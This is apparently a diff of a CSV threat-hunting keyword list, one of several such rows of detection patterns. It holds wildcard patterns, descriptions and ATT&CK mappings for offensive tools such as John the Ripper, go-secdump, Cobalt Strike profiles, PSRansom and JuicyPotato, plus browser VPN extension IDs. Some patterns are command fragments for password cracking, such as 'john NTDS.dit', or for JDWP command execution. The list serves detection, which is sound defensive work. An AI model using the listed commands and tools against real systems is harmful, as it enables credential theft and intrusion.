+"*jdgilggpfmjpbodmhndmhojklgfdlhob*","greyware_tool_keyword","Browser VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*jdk*-activator-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*jdk*-call-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*jdk*-dgc-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*jdk*-method-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*jdk*-reg-bypass.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*jdwp-shellifier.py -t * -p * --cmd *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*jedieiamjmoflcknjdjhpieklepfglin*","greyware_tool_keyword","FastestVPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*jedisct1*","offensive_tool_keyword","Github Username","github username. a knack for cryptography. computer vision. opensource software and infosec. hosting infosec tools used by pentester","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/jedisct1","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*jfjallid/go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*jgbaghohigdbgbolncodkdlpenhcmcge*","greyware_tool_keyword","Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*JGillam/burp-co2*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" +"*Jira-Lens.py*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" +"*jliodmnojccaloajphkingdnpljdhdok*","greyware_tool_keyword","Turbo VPN for PC","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*jljopmgdobloagejpohpldgkiellmfnc*","greyware_tool_keyword","PP VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*jmmcatee/cracklord*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*JMousqueton/PoC-CVE-2022-30190*","offensive_tool_keyword","POC","POC CVE-2022-30190 CVE 0-day MS Offic RCE aka msdt follina","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/JMousqueton/PoC-CVE-2022-30190","1","1","N/A","N/A","2","149","58","2022-06-05T21:06:13Z","2022-05-30T18:17:38Z" +"*jndi_injection.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*JNDI-Injection-Exploit*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" +"*Job killed and console drained*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*JoelGMSec/EvilnoVNC*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z" +"*JoelGMSec/PSRansom*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z" +"*Joey is the best hacker in Hackers*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*john * --incremental*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john * -w=*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john * --wordlist=*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-groups*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *htdigest*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-inc *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-incremental *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-shells*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-show*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-single*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-users*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *--wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john --format=*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*john hashes*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john NTDS.dit*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john --show *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john --status*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*John the Ripper*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john --wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john --wordlist=*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*John*the*Ripper*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john.bash_completion*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john.session.log*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john.zsh_completion*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john/password.lst*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*john/run/fuzz.dic*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john/src/ztex/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john@moozle.wtf*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*john_crack_asrep*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*john_crack_kerberoast*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*john_log_format*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john_mpi.c*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john_register_all*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*JohnTheRipper *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*JohnTheRipper/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*joomscan -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*joomscan*","offensive_tool_keyword","joomscan","Joomla Vulnerability Scanner.","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/rezasp/joomscan","1","0","N/A","N/A","10","950","250","2022-03-19T13:40:03Z","2016-09-01T09:06:17Z" +"*Jormungandr.cpp*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" +"*Jormungandr.exe*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" +"*Jormungandr-master*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" +"*JPCERTCC*","offensive_tool_keyword","Github Username","github repo name containing multiple tools for log exploitation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/JPCERTCC","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*jpgljfpmoofbmlieejglhonfofmahini*","greyware_tool_keyword","Free Residential VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*jpillora/chisel*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*jplnlifepflhkbkgonidnobkakhmpnmh*","greyware_tool_keyword","Private Internet Access","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*jquery-c2.*.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*js-cracker-client/cracker.js*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" +"*JScriptStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*jtee43gt-6543-2iur-9422-83r5w27hgzaq*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*juicycreds_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*JuicyPotato.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*JuicyPotato.exe*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" +"*JuicyPotato.sln*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" 